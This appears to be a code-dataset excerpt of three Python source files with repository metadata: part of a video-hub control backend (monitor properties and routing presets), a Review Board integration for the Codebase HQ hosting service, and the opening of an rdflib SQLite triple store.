prop = kwargs.get('property')
keys = kwargs.get('keys')
if keys is None:
keys = range(len(value))
feedback_prop = '{}s'.format(prop.name.split('_control')[0])
elock = self.emission_lock(feedback_prop)
if elock.held:
return
## TODO: This is an internal implementation in python-dispatch and
## is subject to future changes.
aio_lock = elock.aio_locks.get(id(self.event_loop))
if aio_lock is not None and aio_lock.locked():
return
if value == getattr(self, feedback_prop):
return
coro_name = '_'.join(['set', feedback_prop])
coro = getattr(self, coro_name)
args = [(key, value[key]) for key in keys]
tx_fut = asyncio.run_coroutine_threadsafe(coro(*args), loop=self.event_loop)
class SmartViewBackendBase(BackendBase):
"""Base class for SmartView devices
Attributes:
num_monitors: Number of physical monitors as reported by the device
inverted: ``True`` if the device has been mounted in an inverted
configuration (to optimize viewing angle).
monitors: A ``list`` containing instances of :class:`SmartViewMonitor`
or :class:`SmartScopeMonitor`, depending on device type.
:Events:
.. function:: on_monitor_property_change(self: SmartViewBackendBase, name: str, value: Any, monitor: SmartViewMonitor = monitor)
Dispatched when any :class:`~pydispatch.properties.Property`
value changes. The event signature for callbacks is
``(smartview_device, property_name, value, **kwargs)`` containing
a keyword argument "monitor" containing the :class:`SmartViewMonitor`
instance.
"""
num_monitors: Optional[int] = Property()
inverted: bool = Property(False)
monitors: List['SmartViewMonitor'] = ListProperty()
monitor_cls: ClassVar[type] = None
device_type: ClassVar[str] = 'smartview'
_events_ = ['on_monitor_property_change']
def __init__(self, **kwargs):
self.bind(monitors=self._on_monitors)
super().__init__(**kwargs)
async def set_monitor_property(self, monitor, name, value):
"""Set a property value for the given :class:`SmartViewMonitor` instance
Arguments:
monitor: The :class:`SmartViewMonitor` instance to set
name (str): Property name
value: The new value to set
This method is a coroutine.
"""
raise NotImplementedError()
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartViewMonitor
return cls
async def add_monitor(self, **kwargs):
cls = self.get_monitor_cls()
kwargs.setdefault('parent', self)
kwargs.setdefault('index', len(self.monitors))
monitor = cls(**kwargs)
monitor.bind(on_property_change=self.on_monitor_prop)
self.monitors.append(monitor)
return monitor
def on_monitor_prop(self, instance, name, value, **kwargs):
kwargs['monitor'] = instance
self.emit('on_monitor_property_change', self, name, value, **kwargs)
def _on_monitors(self, *args, **kwargs):
self.num_monitors = len(self.monitors)
class SmartScopeBackendBase(SmartViewBackendBase):
device_type: ClassVar[str] = 'smartscope'
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartScopeMonitor
return cls
MONITOR_PROPERTY_MAP = {k:k.title() for k in [
'brightness', 'contrast', 'saturation', 'identify', 'border']}
MONITOR_PROPERTY_MAP.update({
'widescreen_sd':'WidescreenSD',
'audio_channel':'AudioChannel',
'scope_mode':'ScopeMode',
})
class SmartViewMonitor(Dispatcher):
"""A single instance of a monitor within a SmartView device
Attributes:
index: Index of the monitor (zero-based)
name: The name of the monitor (can be user-defined)
brightness: The brightness value of the monitor (0-255)
contrast: The contrast value of the monitor (0-255)
saturation: The saturation value of the monitor (0-255)
widescreen_sd: Aspect ratio setting for SD format. Choices can be:
``True`` (stretching enabled), ``False`` (pillar-box), or
``None`` (auto-detect).
identify: If set to ``True``, the monitor's border will be white
for a brief duration to physically locate the device.
border: Sets the border of the monitor to the given color. Choices
are: 'red', 'green', 'blue', 'white', or ``None``.
audio_channel: The audio channel pair (Embedded in the SDI input)
used when :attr:`scope_mode` is set to audio monitoring.
Values are from 0 to 7 (0 == Channels 1&2, etc).
"""
index: int = Property()
name: str = Property()
brightness: int = Property()
contrast: int = Property()
saturation: int = Property()
widescreen_sd: Optional[bool] = Property()
identify: bool = Property(False)
border: Optional[str] = Property()
audio_channel: int = Property()
class PropertyChoices():
widescreen_sd = {
True:'ON',
False:'OFF',
None:'auto',
}
border = {
'red':'red',
'green':'green',
'blue':'blue',
'white':'white',
None:'NONE',
}
identify = {
True:'true',
False:'false',
}
_bind_properties = [
'brightness', 'contrast', 'saturation',
'widescreen_sd', 'identify', 'border', 'audio_channel',
]
_events_ = ['on_property_change']
def __init__(self, **kwargs):
self._property_locks = {}
self.parent = kwargs.get('parent')
self.event_loop = self.parent.event_loop
self.index = kwargs.get('index')
self.name = kwargs.get('name')
props = self.PropertyChoices._bind_properties
for prop in props:
value = kwargs.get(prop)
value = self.get_property_for_choice(prop, value)
setattr(self, prop, value)
self.bind(**{prop:self.on_prop_control for prop in props})
def _get_property_lock(self, name):
lock = self._property_locks.get(name)
if lock is None:
lock = asyncio.Lock()
self._property_locks[name] = lock
return lock
async def set_property_from_backend(self, name, value):
value = self.get_property_for_choice(name, value)
lock = self._get_property_lock(name)
async with lock:
setattr(self, name, value)
self.emit('on_property_change', self, name, value)
async def set_property(self, name, value):
await self.parent.set_monitor_property(self, name, value)
async def flash(self):
await self.set_property('identify', True)
def get_property_choices(self, name):
return getattr(self.PropertyChoices, name, None)
def get_choice_for_property(self, name, value):
choices = self.get_property_choices(name)
if choices is not None:
if value in choices:
value = choices[value]
return value
def get_property_for_choice(self, name, value):
choices = self.get_property_choices(name)
if choices is not None:
if value in choices.values():
for k, v in choices.items():
if v == value:
value = k
break
if isinstance(value, str) and value.lower() in ('none', 'true', 'false'):
if value.lower() == 'none':
value = None
else:
value = value.lower() == 'true'
return value
def on_prop_control(self, instance, value, **kwargs):
prop = kwargs.get('property')
lock = self._get_property_lock(prop.name)
if lock.locked():
return
value = self.get_choice_for_property(prop.name, value)
fut = self.set_property(prop.name, value)
asyncio.run_coroutine_threadsafe(fut, loop=self.event_loop)
class SmartScopeMonitor(SmartViewMonitor):
"""A single instance of a monitor within a SmartScope device
Attributes:
scope_mode: The type of scope to display. Choices are:
'audio_dbfs', 'audio_dbvu', 'histogram', 'parade_rgb', 'parade_yuv',
'video', 'vector_100', 'vector_75', 'waveform'.
"""
scope_mode: str = Property()
class PropertyChoices(SmartViewMonitor.PropertyChoices):
scope_mode = {
'audio_dbfs':'AudioDbfs',
'audio_dbvu':'AudioDbvu',
'histogram':'Histogram',
'parade_rgb':'ParadeRGB',
'parade_yuv':'ParadeYUV',
'video':'Picture',
'vector_100':'Vector100',
'vector_75':'Vector75',
'waveform':'WaveformLuma',
}
_bind_properties = SmartViewMonitor.PropertyChoices._bind_properties + [
'scope_mode',
]
class Preset(Dispatcher):
"""Stores and recalls routing information
Attributes:
name: The name of the preset.
This is a :class:`pydispatch.Property`
index: The index of the preset as it is stored in the
:attr:`~BackendBase.presets` container.
crosspoints: The crosspoints that this preset has stored.
This is a :class:`~pydispatch.properties.DictProperty`
active: A flag indicating whether all of the crosspoints stored
in this preset are currently active on the switcher.
This is a :class:`pydispatch.Property`
:Events:
.. function:: on_preset_stored(preset: Preset = self)
Dispatched after the preset stores its state.
"""
name: str = Property()
index: int = Property()
crosspoints: Dict[int, int] = DictProperty()
active: bool = Property(False)
_events_ = ['on_preset_stored']
def __init__(self, **kwargs):
self.backend = kwargs.get('backend')
self.index = kwargs.get('index')
name = kwargs.get('name')
if name is None:
name = 'Preset {}'.format(self.index + 1)
self.name = name
self.crosspoints = kwargs.get('crosspoints', {})
if self.backend.connection_state.is_connected and self.backend.prelude_parsed:
self.check_active()
else:
self.backend.bind(prelude_parsed=self.on_backend_ready)
self.backend.bind(crosspoints=self.on_backend_crosspoints)
self.bind(crosspoints=self.on_preset_crosspoints)
async def store(self, outputs_to_store=None, clear_current=True):
if outputs_to_store is None:
outputs_to_store = range(self.backend.num_outputs)
if clear_current:
self.crosspoints = {}
async with self.emission_lock('crosspoints'):
for out_idx in outputs_to_store:
self.crosspoints[out_idx] = self.backend.crosspoints[out_idx]
self.active = True
self.emit('on_preset_stored', preset=self)
async def recall(self):
if not len(self.crosspoints):
return
args = [(i, v) for i, v in self.crosspoints.items()]
await self.backend.set_crosspoints(*args)
def check_active(self):
if not len(self.crosspoints):
self.active = False
return
for out_idx, in_idx in self.crosspoints.items():
in_idx = self.crosspoints[out_idx]
if self.backend.crosspoints[out_idx] != in_idx:
self.active = False
return
self.active = True
def on_backend_ready(self, instance, value, **kwargs):
if not value:
return
self.backend.unbind(self.on_backend_ready)
self.check_active()
def on_backend_crosspoints(self, instance, value, **kwargs):
if not self.backend.prelude_parsed:
return
self.check_active()
def on_preset_crosspoints(self, instance, value, **kwargs):
if not len(self.crosspoints) or not self.backend.prelude_parsed:
return
self.check_active()
|
nocarryr/vidhub-control
|
vidhubcontrol/backends/base.py
|
Python
|
gpl-3.0
| 27,623 | 0.004236 |
from __future__ import unicode_literals
import logging
from xml.dom.minidom import parseString
from django import forms
from django.utils import six
from django.utils.six.moves.urllib.error import HTTPError, URLError
from django.utils.translation import ugettext_lazy as _, ugettext
from reviewboard.hostingsvcs.errors import (AuthorizationError,
HostingServiceAPIError,
RepositoryError)
from reviewboard.hostingsvcs.forms import (HostingServiceAuthForm,
HostingServiceForm)
from reviewboard.hostingsvcs.service import (HostingService,
HostingServiceClient)
from reviewboard.scmtools.crypto_utils import (decrypt_password,
encrypt_password)
from reviewboard.scmtools.errors import FileNotFoundError
class CodebaseHQAuthForm(HostingServiceAuthForm):
api_key = forms.CharField(
label=_('API key'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The API key provided to your Codebase account. This is '
'available in My Profile under API Credentials.'))
domain = forms.CharField(
label=_('Codebase domain'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The subdomain used to access your Codebase account. '
'This is the "<tt>subdomain</tt>" of '
'<tt>subdomain</tt>.codebasehq.com.'))
def get_credentials(self):
credentials = super(CodebaseHQAuthForm, self).get_credentials()
credentials.update({
'domain': self.cleaned_data['domain'],
'api_key': self.cleaned_data['api_key'],
})
return credentials
class Meta(object):
help_texts = {
'hosting_account_username': _(
'The username you use to log into Codebase. This should '
'<em>not</em> include the domain name.'
),
'hosting_account_password': _(
'The password you use to log into Codebase. This is separate '
'from the API key below.'
),
}
class CodebaseHQForm(HostingServiceForm):
codebasehq_project_name = forms.CharField(
label=_('Project name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}))
codebasehq_repo_name = forms.CharField(
label=_('Repository short name'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The short name of your repository. This can be found by '
'clicking the Settings button on the right-hand '
'side of the repository browser.'))
class CodebaseHQClient(HostingServiceClient):
"""Client for talking to the Codebase API.
This implements the API methods that the hosting service needs, converting
requests into API calls and those back into structured results.
"""
#: Mimetype used for API requests and responses.
API_MIMETYPE = 'application/xml'
def __init__(self, hosting_service):
"""Initialize the client.
Args:
hosting_service (CodebaseHQ):
The hosting service that owns this client.
"""
self.hosting_service = hosting_service
def api_get_file(self, repository, project_name, repo_name, path,
revision):
"""Return the content of a file in a repository.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository entry in Review Board.
project_name (unicode):
The name of the Codebase project.
repo_name (unicode):
The name of the repository.
path (unicode):
The path to the file in the repository.
revision (unicode):
The revision of the file or commit.
Returns:
bytes:
The contents of the file.
"""
url = '%s/%s/blob/' % (project_name, repo_name)
if repository.tool.name == 'Git':
url += revision
else:
if path.startswith('/'):
path = path[1:]
url += '%s/%s' % (revision, path)
return self.api_get(self.build_api_url(url), raw_content=True)
def api_get_public_keys(self, username):
"""Return information on all public keys for a user.
Args:
username (unicode):
The user to fetch public keys for.
Returns:
dict:
Information on each of the user's public keys.
"""
return self.api_get(self.build_api_url('users/%s/public_keys'
% username))
def api_get_repository(self, project_name, repo_name):
"""Return information on a repository.
Args:
project_name (unicode):
The name of the Codebase project.
repo_name (unicode):
The name of the repository.
Returns:
dict:
Information on the repository.
See https://support.codebasehq.com/kb/repositories for the
data returned.
"""
return self.api_get(
self.build_api_url('%s/%s' % (project_name, repo_name)))
def build_api_url(self, url):
"""Return the URL for an API call.
Args:
url (unicode):
The relative URL for the API call.
Returns:
unicode:
The absolute URL for the API call.
"""
return 'https://api3.codebasehq.com/%s' % url
def api_get(self, url, raw_content=False):
"""Perform an HTTP GET request to the API.
Args:
url (unicode):
The full URL to the API resource.
raw_content (bool, optional):
If set to ``True``, the raw content of the result will be
returned, instead of a parsed XML result.
Returns:
object:
The parsed content of the result, as a dictionary, or the raw
bytes content if ``raw_content`` is ``True``.
"""
hosting_service = self.hosting_service
try:
account_data = hosting_service.account.data
api_username = '%s/%s' % (account_data['domain'],
hosting_service.account.username)
api_key = decrypt_password(account_data['api_key'])
data, headers = self.http_get(
url,
username=api_username,
password=api_key,
headers={
'Accept': self.API_MIMETYPE,
})
if raw_content:
return data
else:
return self.parse_xml(data)
except HTTPError as e:
data = e.read()
msg = six.text_type(e)
rsp = self.parse_xml(data)
if rsp and 'errors' in rsp:
errors = rsp['errors']
if 'error' in errors:
msg = errors['error']
if e.code == 401:
raise AuthorizationError(msg)
else:
raise HostingServiceAPIError(msg, http_code=e.code, rsp=rsp)
except URLError as e:
raise HostingServiceAPIError(e.reason)
def get_xml_text(self, nodes):
"""Return the text contents of a set of XML nodes.
Args:
nodes (list of xml.dom.minidom.Element):
The list of nodes.
Returns:
unicode:
The text content of the nodes.
"""
return ''.join(
node.data
for node in nodes
if node.nodeType == node.TEXT_NODE
)
def parse_xml(self, s):
"""Return the parsed content for an XML document.
Args:
s (unicode):
The XML document as a string.
Returns:
dict:
The parsed content of the XML document, with each key
being a dictionary of other parsed content.
If the document cannot be parsed, this will return ``None``.
"""
try:
doc = parseString(s)
except:
return None
root = doc.documentElement
return {
root.tagName: self._parse_xml_node(root),
}
def _parse_xml_node(self, node):
"""Return the parsed content for a node in an XML document.
This parses the content of a Codebase XML document, turning it into
arrays, strings, and dictionaries of data.
Args:
node (xml.dom.minidom.Element):
The node being parsed.
Returns:
object:
The parsed content of the node, based on the type of node being
processed.
"""
node_type = node.getAttribute('type')
is_nil = node.getAttribute('nil')
if node_type == 'array':
result = [
self._parse_xml_node(child)
for child in node.childNodes
if child.nodeType == child.ELEMENT_NODE
]
elif is_nil == 'true':
result = None
else:
child_nodes = [
child
for child in node.childNodes
if child.nodeType == child.ELEMENT_NODE
]
if child_nodes:
result = dict([
(child.tagName, self._parse_xml_node(child))
for child in child_nodes
])
else:
result = self.get_xml_text(node.childNodes)
return result
class CodebaseHQ(HostingService):
"""Repository hosting support for Codebase.
Codebase is a repository hosting service that supports Subversion, Git,
and Mercurial. It's available at https://codebasehq.com.
This integration provides repository validation and file fetching. Due to
API limitations, it does not support post-commit review at this time.
"""
name = 'Codebase HQ'
form = CodebaseHQForm
auth_form = CodebaseHQAuthForm
needs_authorization = True
supports_bug_trackers = True
supports_repositories = True
supported_scmtools = ['Git', 'Subversion', 'Mercurial']
repository_fields = {
'Git': {
'path': '[email protected]:%(domain)s/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.git',
},
'Subversion': {
'path': 'https://%(domain)s.codebasehq.com/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.svn',
},
'Mercurial': {
'path': 'https://%(domain)s.codebasehq.com/'
'projects/%(codebasehq_project_name)s/repositories/'
'%(codebasehq_repo_name)s/',
},
}
bug_tracker_field = (
'https://%(domain)s.codebasehq.com/projects/'
'%(codebasehq_project_name)s/tickets/%%s'
)
#: A mapping of Codebase SCM types to SCMTool names.
REPO_SCM_TOOL_MAP = {
'git': 'Git',
'svn': 'Subversion',
'hg': 'Mercurial',
}
def __init__(self, *args, **kwargs):
"""Initialize the hosting service.
Args:
*args (tuple):
Positional arguments for the parent constructor.
**kwargs (dict):
Keyword arguments for the parent constructor.
"""
super(CodebaseHQ, self).__init__(*args, **kwargs)
self.client = CodebaseHQClient(self)
def authorize(self, username, password, credentials, *args, **kwargs):
"""Authorize an account for Codebase.
Codebase usees HTTP Basic Auth with an API username (consisting of the
Codebase team's domain and the account username) and an API key (for
the password) for API calls, and a standard username/password for
Subversion repository access. We need to store all of this.
Args:
username (unicode):
The username to authorize.
password (unicode):
The API token used as a password.
credentials (dict):
Additional credentials from the authentication form.
*args (tuple):
Extra unused positional arguments.
**kwargs (dict):
Extra unused keyword arguments.
Raises:
reviewboard.hostingsvcs.errors.AuthorizationError:
The credentials provided were not valid.
"""
self.account.data.update({
'domain': credentials['domain'],
'api_key': encrypt_password(credentials['api_key']),
'password': encrypt_password(password),
})
# Test the account to make sure the credentials are fine. Note that
# we can only really sanity-check the API token, domain, and username
# from here. There's no way good way to check the actual password,
# which we only use for Subversion repositories.
#
# This will raise a suitable error message if authorization fails.
try:
self.client.api_get_public_keys(username)
except AuthorizationError:
raise AuthorizationError(
ugettext('One or more of the credentials provided were not '
'accepted by Codebase.'))
self.account.save()
def is_authorized(self):
"""Return if the account has been authorized.
This checks if all the modern authentication details are stored along
with the account.
Returns:
bool:
``True`` if all required credentials are set for the account.
"""
return (self.account.data.get('api_key') is not None and
self.account.data.get('password') is not None and
self.account.data.get('domain') is not None)
def get_password(self):
"""Return the password for this account.
This is used primarily for Subversion repositories, so that direct
access can be performed in order to fetch properties and other
information.
This does not return the API key.
Returns:
unicode:
The account password for repository access.
"""
return decrypt_password(self.account.data['password'])
def check_repository(self, codebasehq_project_name=None,
codebasehq_repo_name=None, tool_name=None,
*args, **kwargs):
"""Check the validity of a repository.
This will perform an API request against Codebase to get information on
the repository. This will throw an exception if the repository was not
found, and return cleanly if it was found.
Args:
codebase_project_name (unicode):
The name of the project on Codebase.
codebasehq_repo_name (unicode):
The name of the repository on Codebase.
tool_name (unicode):
The name of the SCMTool for the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Raises:
reviewboard.hostingsvcs.errors.RepositoryError:
The repository was not found.
"""
# The form should enforce these values.
assert codebasehq_project_name
assert codebasehq_repo_name
assert tool_name
try:
info = self.client.api_get_repository(codebasehq_project_name,
codebasehq_repo_name)
except HostingServiceAPIError as e:
logging.error('Error finding Codebase repository "%s" for '
'project "%s": %s',
codebasehq_repo_name, codebasehq_project_name,
e)
raise RepositoryError(
ugettext('A repository with this name and project was '
'not found.'))
try:
scm_type = info['repository']['scm']
except KeyError:
logging.error('Missing "scm" field for Codebase HQ repository '
'payload: %r',
info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
try:
expected_tool_name = self.REPO_SCM_TOOL_MAP[scm_type]
except KeyError:
logging.error('Unexpected "scm" value "%s" for Codebase HQ '
'repository, using payload: %r',
scm_type, info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
if expected_tool_name != tool_name:
raise RepositoryError(
ugettext("The repository type doesn't match what you "
"selected. Did you mean %s?")
% expected_tool_name)
def get_file(self, repository, path, revision, *args, **kwargs):
"""Returns the content of a file in a repository.
This will perform an API request to fetch the contents of a file.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository containing the file.
path (unicode):
The path to the file in the repository.
revision (unicode):
The revision of the file in the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Returns:
byets:
The content of the file in the repository.
"""
try:
return self.client.api_get_file(
repository,
repository.extra_data['codebasehq_project_name'],
repository.extra_data['codebasehq_repo_name'],
path, revision)
except HostingServiceAPIError as e:
if e.http_code == 404:
raise FileNotFoundError(path, revision)
else:
logging.warning('Failed to fetch file from Codebase HQ '
'repository %s: %s',
repository, e)
raise
def get_file_exists(self, repository, path, revision, *args, **kwargs):
"""Returns whether a given file exists.
This will perform an API request to fetch the contents of a file,
returning ``True`` if the content could be fetched.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository containing the file.
path (unicode):
The path to the file in the repository.
revision (unicode):
The revision of the file in the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Returns:
bool:
``True`` if the file exists in the repository.
"""
try:
self.client.api_get_file(
repository,
repository.extra_data['codebasehq_project_name'],
repository.extra_data['codebasehq_repo_name'],
path, revision)
return True
except HostingServiceAPIError:
return False
|
davidt/reviewboard
|
reviewboard/hostingsvcs/codebasehq.py
|
Python
|
mit
| 20,408 | 0.000049 |
from __future__ import generators
from rdflib import BNode
from rdflib.Literal import Literal
from pprint import pprint
from pysqlite2 import dbapi2
import sha,sys,re,os
from rdflib.term_utils import *
from rdflib.Graph import QuotedGraph
from rdflib.store.REGEXMatching import REGEXTerm, NATIVE_REGEX, PYTHON_REGEX
from rdflib.store.AbstractSQLStore import *
Any = None
#User-defined REGEXP operator
def regexp(expr, item):
r = re.compile(expr)
return r.match(item) is not None
class SQLite(AbstractSQLStore):
"""
SQLite store formula-aware implementation. It stores it's triples in the following partitions:
- Asserted non rdf:type statements
- Asserted rdf:type statements (in a table which models Class membership)
The motivation for this partition is primarily query speed and scalability as most graphs will always have more rdf:type statements than others
- All Quoted statements
In addition it persists namespace mappings in a seperate table
"""
context_aware = True
formula_aware = True
transaction_aware = True
regex_matching = PYTHON_REGEX
autocommit_default = False
def open(self, home, create=True):
"""
Opens the store specified by the configuration string. If
create is True a store will be created if it does not already
exist. If create is False and a store does not already exist
an exception is raised. An exception is also raised if a store
exists, but there is insufficient permissions to open the
store."""
if create:
db = dbapi2.connect(os.path.join(home,self.identifier))
c=db.cursor()
c.execute(CREATE_ASSERTED_STATEMENTS_TABLE%(self._internedId))
c.execute(CREATE_ASSERTED_TYPE_STATEMENTS_TABLE%(self._internedId))
c.execute(CREATE_QUOTED_STATEMENTS_TABLE%(self._internedId))
c.execute(CREATE_NS_BINDS_TABLE%(self._internedId))
c.execute(CREATE_LITERAL_STATEMENTS_TABLE%(self._internedId))
for tblName,indices in [
(
"%s_asserted_statements",
[
("%s_A_termComb_index",('termComb',)),
("%s_A_s_index",('subject',)),
("%s_A_p_index",('predicate',)),
("%s_A_o_index",('object',)),
("%s_A_c_index",('context',)),
],
),
(
"%s_type_statements",
[
("%s_T_termComb_index",('termComb',)),
("%s_member_index",('member',)),
("%s_klass_index",('klass',)),
("%s_c_index",('context',)),
],
),
(
"%s_literal_statements",
[
("%s_L_termComb_index",('termComb',)),
("%s_L_s_index",('subject',)),
("%s_L_p_index",('predicate',)),
("%s_L_c_index",('context',)),
],
),
(
"%s_quoted_statements",
[
("%s_Q_termComb_index",('termComb',)),
("%s_Q_s_index",('subject',)),
("%s_Q_p_index",('predicate',)),
("%s_Q_o_index",('object',)),
("%s_Q_c_index",('context',)),
],
),
(
"%s_namespace_binds",
[
("%s_uri_index",('uri',)),
],
)]:
for indexName,columns in indices:
c.execute("CREATE INDEX %s on %s (%s)"%(indexName%self._internedId,tblName%(self._internedId),','.join(columns)))
c.close()
db.commit()
db.close()
self._db = dbapi2.connect(os.path.join(home,self.identifier))
self._db.create_function("regexp", 2, regexp)
if os.path.exists(os.path.join(home,self.identifier)):
c = self._db.cursor()
c.execute("SELECT * FROM sqlite_master WHERE type='table'")
tbls = [rt[1] for rt in c.fetchall()]
c.close()
for tn in [tbl%(self._internedId) for tbl in table_name_prefixes]:
if tn not in tbls:
sys.stderr.write("table %s Doesn't exist\n" % (tn));
#The database exists, but one of the partitions doesn't exist
return 0
#Everything is there (the database and the partitions)
return 1
#The database doesn't exist - nothing is there
#return -1
def destroy(self, home):
"""
FIXME: Add documentation
"""
db = dbapi2.connect(os.path.join(home,self.identifier))
c=db.cursor()
for tblsuffix in table_name_prefixes:
try:
c.execute('DROP table %s'%tblsuffix%(self._internedId))
except:
print "unable to drop table: %s"%(tblsuffix%(self._internedId))
#Note, this only removes the associated tables for the closed world universe given by the identifier
print "Destroyed Close World Universe %s ( in SQLite database %s)"%(self.identifier,home)
db.commit()
c.close()
db.close()
os.remove(os.path.join(home,self.identifier))
def EscapeQuotes(self,qstr):
"""
Ported from Ft.Lib.DbUtil
"""
if qstr is None:
return ''
tmp = qstr.replace("\\","\\\\")
tmp = tmp.replace('"', '""')
tmp = tmp.replace("'", "\\'")
return tmp
#This is overridden to leave unicode terms as is
#Instead of converting them to ascii (the default behavior)
def normalizeTerm(self,term):
if isinstance(term,(QuotedGraph,Graph)):
return term.identifier
elif isinstance(term,Literal):
return self.EscapeQuotes(term)
elif term is None or isinstance(term,(list,REGEXTerm)):
return term
else:
return term
#Where Clause utility Functions
#The predicate and object clause builders are modified in order to optimize
#subjects and objects utility functions which can take lists as their last argument (object,predicate - respectively)
def buildSubjClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
if isinstance(s,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject') + " %s")
paramStrings.append(self.normalizeTerm(s))
elif isinstance(s,(QuotedGraph,Graph)):
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(subject,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[self.normalizeTerm(subject.identifier)]
else:
return subject is not None and "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[subject] or None
#Capable off taking a list of predicates as well (in which case sub clauses are joined with 'OR')
def buildPredClause(self,predicate,tableName):
if isinstance(predicate,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'),[predicate]
elif isinstance(predicate,list):
clauseStrings=[]
paramStrings = []
for p in predicate:
if isinstance(p,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'))
else:
clauseStrings.append("%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s")
paramStrings.append(self.normalizeTerm(p))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return predicate is not None and "%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s",[predicate] or None
#Capable of taking a list of objects as well (in which case sub clauses are joined with 'OR')
def buildObjClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
if isinstance(o,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'))
paramStrings.append(self.normalizeTerm(o))
elif isinstance(o,(QuotedGraph,Graph)):
clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normalizeTerm(o.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(obj,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[self.normalizeTerm(obj.identifier)]
else:
return obj is not None and "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[obj] or None
def buildContextClause(self,context,tableName):
context = context is not None and self.normalizeTerm(context.identifier) or context
if isinstance(context,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.context'%tableName or 'context'),[context]
else:
return context is not None and "%s="%(tableName and '%s.context'%tableName or 'context')+"%s",[context] or None
def buildTypeMemberClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.member'%tableName or 'member'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
clauseStrings.append("%s.member="%tableName+"%s")
if isinstance(s,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(s.identifier))
else:
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return subject and u"%s.member = "%(tableName)+"%s",[subject]
def buildTypeClassClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.klass'%tableName or 'klass'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
clauseStrings.append("%s.klass="%tableName+"%s")
if isinstance(o,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(o.identifier))
else:
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return obj is not None and "%s.klass = "%tableName+"%s",[obj] or None
def triples(self, (subject, predicate, obj), context=None):
"""
A generator over all the triples matching pattern. Pattern can
be any objects for comparing against nodes in the store, for
example, RegExLiteral, Date? DateRange?
quoted table: <id>_quoted_statements
asserted rdf:type table: <id>_type_statements
asserted non rdf:type table: <id>_asserted_statements
triple columns: subject,predicate,object,context,termComb,objLanguage,objDatatype
class membership columns: member,klass,context termComb
FIXME: These union all selects *may* be further optimized by joins
"""
quoted_table="%s_quoted_statements"%self._internedId
asserted_table="%s_asserted_statements"%self._internedId
asserted_type_table="%s_type_statements"%self._internedId
literal_table = "%s_literal_statements"%self._internedId
c=self._db.cursor()
parameters = []
if predicate == RDF.type:
#select from asserted rdf:type partition and quoted table (if a context is specified)
clauseString,params = self.buildClause('typeTable',subject,RDF.type, obj,context,True)
parameters.extend(params)
selects = [
(
asserted_type_table,
'typeTable',
clauseString,
ASSERTED_TYPE_PARTITION
),
]
elif isinstance(predicate,REGEXTerm) and predicate.compiledExpr.match(RDF.type) or not predicate:
#Select from quoted partition (if context is specified), literal partition if (obj is Literal or None) and asserted non rdf:type partition (if obj is URIRef or None)
selects = []
